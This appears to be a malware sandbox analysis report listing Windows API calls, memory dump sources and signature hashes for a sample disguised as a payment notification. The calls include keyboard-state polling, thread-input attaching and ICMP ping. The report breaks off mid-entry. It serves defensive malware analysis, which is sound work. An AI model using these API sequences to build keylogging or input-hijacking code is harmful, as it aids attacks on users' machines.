                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 0093FBA1
                                                                              • VariantClear.OLEAUT32(?), ref: 0093FBB6
                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 0093FBC3
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBCC
                                                                              • VariantClear.OLEAUT32(?), ref: 0093FBDE
                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 0093FBE9
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                              • String ID:
                                                                              • API String ID: 2706829360-0
                                                                              • Opcode ID: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
                                                                              • Instruction ID: 167dcb07f6a5b366e233ecfe48edd4c58484b52e796e228bc7ff4a17ac0e3935
                                                                              • Opcode Fuzzy Hash: 4fc4d15c035b8898abb8bf8fee294320ed71a29ea65dd25dff6742f6c70c0cce
                                                                              • Instruction Fuzzy Hash: 04414F75E04219AFCB00DF68D8689AEBBB9FF48344F008069E959E7261DB34A945CF90
                                                                              APIs
                                                                              • GetKeyboardState.USER32(?), ref: 00949CA1
                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 00949D22
                                                                              • GetKeyState.USER32(000000A0), ref: 00949D3D
                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 00949D57
                                                                              • GetKeyState.USER32(000000A1), ref: 00949D6C
                                                                              • GetAsyncKeyState.USER32(00000011), ref: 00949D84
                                                                              • GetKeyState.USER32(00000011), ref: 00949D96
                                                                              • GetAsyncKeyState.USER32(00000012), ref: 00949DAE
                                                                              • GetKeyState.USER32(00000012), ref: 00949DC0
                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 00949DD8
                                                                              • GetKeyState.USER32(0000005B), ref: 00949DEA
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: State$Async$Keyboard
                                                                              • String ID:
                                                                              • API String ID: 541375521-0
                                                                              • Opcode ID: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
                                                                              • Instruction ID: e419e3e6dfeb070023e542e9cef2bb30e508e38da1a8c11a6b9ba71a0db88330
                                                                              • Opcode Fuzzy Hash: cbf40bca3d369b864f09c2624ee68957303565ef5c6c5f14602760491a607422
                                                                              • Instruction Fuzzy Hash: 6641ED749087C96DFF319B60C844BB7BEE86F11344F04805EE6CA576C2D7A599C4C792
                                                                              APIs
                                                                              • WSAStartup.WSOCK32(00000101,?), ref: 009605BC
                                                                              • inet_addr.WSOCK32(?), ref: 0096061C
                                                                              • gethostbyname.WSOCK32(?), ref: 00960628
                                                                              • IcmpCreateFile.IPHLPAPI ref: 00960636
                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 009606C6
                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 009606E5
                                                                              • IcmpCloseHandle.IPHLPAPI(?), ref: 009607B9
                                                                              • WSACleanup.WSOCK32 ref: 009607BF
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                              • String ID: Ping
                                                                              • API String ID: 1028309954-2246546115
                                                                              • Opcode ID: f55e0252088db35315e53bc4fa068f66b961bbfbd141071547922666b99e7bfa
                                                                              • Instruction ID: 3cfb6cedb31e3142c09fb169f04dcce0ebbf1a5862989ad2b3ecc8755de1006a
                                                                              • Opcode Fuzzy Hash: f55e0252088db35315e53bc4fa068f66b961bbfbd141071547922666b99e7bfa
                                                                              • Instruction Fuzzy Hash: 0C918C756082419FD320CF19D889F1ABBE4FF84318F1485A9F46A8B6A2C730ED41CF92
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$BuffCharLower
                                                                              • String ID: cdecl$none$stdcall$winapi
                                                                              • API String ID: 707087890-567219261
                                                                              • Opcode ID: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
                                                                              • Instruction ID: 46e879857f17c399457b43c38231ea2a83a661c1a97b8a17c3b0dcda21daca62
                                                                              • Opcode Fuzzy Hash: d39730fa5acb8b53a39dfc673d539e760bd85f697f1ac1a7c42a5e668142452e
                                                                              • Instruction Fuzzy Hash: A251BF72A001169BCF24EF6CC9509BFB7A9BF65724B204729E966E72C0DB35DD40C7A0
                                                                              APIs
                                                                              • CoInitialize.OLE32 ref: 00963774
                                                                              • CoUninitialize.OLE32 ref: 0096377F
                                                                              • CoCreateInstance.OLE32(?,00000000,00000017,0097FB78,?), ref: 009637D9
                                                                              • IIDFromString.OLE32(?,?), ref: 0096384C
                                                                              • VariantInit.OLEAUT32(?), ref: 009638E4
                                                                              • VariantClear.OLEAUT32(?), ref: 00963936
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize
                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                              • API String ID: 636576611-1287834457
                                                                              • Opcode ID: d6d9520a9303486c6b4d5074ad0ccfeed4e68fd18dad4097fcf8178d7354b30c
                                                                              • Instruction ID: 83d60fbbb1cb757801e59c3a170467d22e4a31e9652a08cf7e08e47b3d4d8b06
                                                                              • Opcode Fuzzy Hash: d6d9520a9303486c6b4d5074ad0ccfeed4e68fd18dad4097fcf8178d7354b30c
                                                                              • Instruction Fuzzy Hash: 17619071608311AFD310DF65C849FAABBE8EF89714F10881DF9859B291D770EE48CB92
                                                                              APIs
                                                                              • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 009533CF
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                              • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 009533F0
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: LoadString$_wcslen
                                                                              • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                              • API String ID: 4099089115-3080491070
                                                                              • Opcode ID: ae708e6f94144dbd8dedc437ef50a47daa9dba781294ac7c4023ad6947c00250
                                                                              • Instruction ID: cd2287326320a41b52aeff50f4a3cd094614ba81fb9e81b70c64779308b5517b
                                                                              • Opcode Fuzzy Hash: ae708e6f94144dbd8dedc437ef50a47daa9dba781294ac7c4023ad6947c00250
                                                                              • Instruction Fuzzy Hash: D051DF32800249AADF15EBA5CD46EEEB7B8FF45340F244165F509B20A2EB312F58DB61
                                                                              APIs
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _wcslen$BuffCharUpper
                                                                              • String ID: APPEND$EXISTS$KEYS$REMOVE
                                                                              • API String ID: 1256254125-769500911
                                                                              • Opcode ID: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
                                                                              • Instruction ID: 06569ac1300098ff4f1c8b0337d24794073b5a2707730e5e3eff7002e96c5a76
                                                                              • Opcode Fuzzy Hash: 90643c22bfe11775bb45af2f2c34a4fc87683c4e3bafb0e2f64b286ca0c87c3e
                                                                              • Instruction Fuzzy Hash: AC41EC32A011279BCB205F7DC8909BE77A9BFA1B74B264529E921DB284E735CD81C790
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 009553A0
                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 00955416
                                                                              • GetLastError.KERNEL32 ref: 00955420
                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 009554A7
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                              • API String ID: 4194297153-14809454
                                                                              • Opcode ID: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
                                                                              • Instruction ID: 8b8b41149fcb1a22b1ebc98a8acc72f711b7373e802ce52645c2813b9bfaf0fb
                                                                              • Opcode Fuzzy Hash: cd10d6c01fd75c0c523ee032216a7551e962e201e109a482687eb14441855181
                                                                              • Instruction Fuzzy Hash: 4231D675A006049FD710DF6AC894BA97BF8FF45306F198069E805CB2A3D771DD8ACB91
                                                                              APIs
                                                                              • CreateMenu.USER32 ref: 00973C79
                                                                              • SetMenu.USER32(?,00000000), ref: 00973C88
                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00973D10
                                                                              • IsMenu.USER32(?), ref: 00973D24
                                                                              • CreatePopupMenu.USER32 ref: 00973D2E
                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 00973D5B
                                                                              • DrawMenuBar.USER32 ref: 00973D63
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup
                                                                              • String ID: 0$F
                                                                              • API String ID: 161812096-3044882817
                                                                              • Opcode ID: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
                                                                              • Instruction ID: f78824ba80dc3afde11b800d0535cb077fb062869742d0dafa014b9054a7955b
                                                                              • Opcode Fuzzy Hash: a528df7c2b759bf3b666855ab6d8d40a652b581be3822cb771c8b6a19420fb2c
                                                                              • Instruction Fuzzy Hash: 04417F76615205EFDB24CF54D844ADA77B9FF89350F14802CF94A973A0D771AA10EF90
                                                                              APIs
                                                                                • Part of subcall function 008E9CB3: _wcslen.LIBCMT ref: 008E9CBD
                                                                                • Part of subcall function 00943CA7: GetClassNameW.USER32(?,?,000000FF), ref: 00943CCA
                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00020000), ref: 00941F64
                                                                              • GetDlgCtrlID.USER32 ref: 00941F6F
                                                                              • GetParent.USER32 ref: 00941F8B
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00941F8E
                                                                              • GetDlgCtrlID.USER32(?), ref: 00941F97
                                                                              • GetParent.USER32(?), ref: 00941FAB
                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 00941FAE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$CtrlParent$ClassName_wcslen
                                                                              • String ID: ComboBox$ListBox
                                                                              • API String ID: 711023334-1403004172
                                                                              • Opcode ID: 4455b87b1c8824c85a34478fbef71abc7bd37bfb12724d4ef6f19c76a99637d6
                                                                              • Instruction ID: 665ea29430687937b38abb1b22c6e562c8d3e7294c4a79900f0b1998ac4215c3
                                                                              • Opcode Fuzzy Hash: 4455b87b1c8824c85a34478fbef71abc7bd37bfb12724d4ef6f19c76a99637d6
                                                                              • Instruction Fuzzy Hash: 5021D471A00214BBCF04AFA4CC85EEEBBB8EF06310F104559F9A5A72A1DB755989DB60
                                                                              APIs
                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00973A9D
                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00973AA0
                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 00973AC7
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00973AEA
                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00973B62
                                                                              • SendMessageW.USER32(?,00001074,00000000,00000007), ref: 00973BAC
                                                                              • SendMessageW.USER32(?,00001057,00000000,00000000), ref: 00973BC7
                                                                              • SendMessageW.USER32(?,0000101D,00001004,00000000), ref: 00973BE2
                                                                              • SendMessageW.USER32(?,0000101E,00001004,00000000), ref: 00973BF6
                                                                              • SendMessageW.USER32(?,00001008,00000000,00000007), ref: 00973C13
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$LongWindow
                                                                              • String ID:
                                                                              • API String ID: 312131281-0
                                                                              • Opcode ID: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
                                                                              • Instruction ID: da4121b6eb043b2d8913baec635d32ed4a9e6ae32e6895d1b8f29f763565f32b
                                                                              • Opcode Fuzzy Hash: 95d1c6d4556be9fe8f437fe3743979895b939ced4d7d5f9c61aad2e3cec51f9b
                                                                              • Instruction Fuzzy Hash: 32619D72900248AFDB11DFA8CD81EEE77B8EF49710F148159FA19A7291C770AE41EB50
                                                                              APIs
                                                                              • GetCurrentThreadId.KERNEL32 ref: 0094B151
                                                                              • GetForegroundWindow.USER32(00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B165
                                                                              • GetWindowThreadProcessId.USER32(00000000), ref: 0094B16C
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B17B
                                                                              • GetWindowThreadProcessId.USER32(?,00000000), ref: 0094B18D
                                                                              • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1A6
                                                                              • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1B8
                                                                              • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B1FD
                                                                              • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B212
                                                                              • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,0094A1E1,?,00000001), ref: 0094B21D
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                              • String ID:
                                                                              • API String ID: 2156557900-0
                                                                              • Opcode ID: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
                                                                              • Instruction ID: 0cf3dbd4bf576384e707974bc5eb6fed9eae98ce8a4ad620338def36857801da
                                                                              • Opcode Fuzzy Hash: 45e3b89b6b6973debd56d153f1500a3ce9b9dc9690211d7a551c24c0b8bd628a
                                                                              • Instruction Fuzzy Hash: 1B31CCB2568208BFDB20EF24DD98F6D7BADBF65721F108109FA14D6190D7B4DA809F60
                                                                              APIs
                                                                              • _free.LIBCMT ref: 00912C94
                                                                                • Part of subcall function 009129C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000), ref: 009129DE
                                                                                • Part of subcall function 009129C8: GetLastError.KERNEL32(00000000,?,0091D7D1,00000000,00000000,00000000,00000000,?,0091D7F8,00000000,00000007,00000000,?,0091DBF5,00000000,00000000), ref: 009129F0
                                                                              • _free.LIBCMT ref: 00912CA0
                                                                              • _free.LIBCMT ref: 00912CAB
                                                                              • _free.LIBCMT ref: 00912CB6
                                                                              • _free.LIBCMT ref: 00912CC1
                                                                              • _free.LIBCMT ref: 00912CCC
                                                                              • _free.LIBCMT ref: 00912CD7
                                                                              • _free.LIBCMT ref: 00912CE2
                                                                              • _free.LIBCMT ref: 00912CED
                                                                              • _free.LIBCMT ref: 00912CFB
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                              • String ID:
                                                                              • API String ID: 776569668-0
                                                                              • Opcode ID: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
                                                                              • Instruction ID: e14753dac2e16fa8455a3e11404f128b18a19feb055b27da55dcb0e7ef416de1
                                                                              • Opcode Fuzzy Hash: dbed2ebc7feefa0674dfb88b01fc67230a2d54f0d8f15f242b58849ffaf1d26c
                                                                              • Instruction Fuzzy Hash: 5611667660010CAFCB02FF58D942DDD3BA9FF45360F5145A5FA585F222D631EAA09B90
                                                                              APIs
                                                                              • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 008E1459
                                                                              • OleUninitialize.OLE32(?,00000000), ref: 008E14F8
                                                                              • UnregisterHotKey.USER32(?), ref: 008E16DD
                                                                              • DestroyWindow.USER32(?), ref: 009224B9
                                                                              • FreeLibrary.KERNEL32(?), ref: 0092251E
                                                                              • VirtualFree.KERNEL32(?,00000000,00008000), ref: 0092254B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1706394141.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1706369843.00000000008E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.000000000097C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706482310.00000000009A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706541080.00000000009AC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1706561424.00000000009B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8e0000_Payment Notification Confirmation Documents 09_01_2025 Paper bill.jbxd
                                                                              Similarity
                                                                              • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                              • String ID: close all
                                                                              • API String ID: 469580280-3243417748
                                                                              • Opcode ID: 8ff6d5c05bacf434e399564ae016a3842d8cac019e21e7ec2c85fe8b1e2168e1
                                                                              • Instruction ID: 02013cef18a40acc03f4c57eaff4ee451065160091027f607a79571a06703b10
                                                                              • Opcode Fuzzy Hash: 8ff6d5c05bacf434e399564ae016a3842d8cac019e21e7ec2c85fe8b1e2168e1
                                                                              • Instruction Fuzzy Hash: 50D1A071701262DFCB29EF15D899A29F7A4FF06700F1481ADE54AAB266CB30ED12CF51
                                                                              APIs
                                                                              • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00957FAD
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00957FC1
                                                                              • GetFileAttributesW.KERNEL32(?), ref: 00957FEB
                                                                              • SetFileAttributesW.KERNEL32(?,00000000), ref: 00958005
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00958017
                                                                              • SetCurrentDirectoryW.KERNEL32(?), ref: 00958060
                                                                              • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 009580B0
                                                                              Strings
                                                                              Memory Dump Source
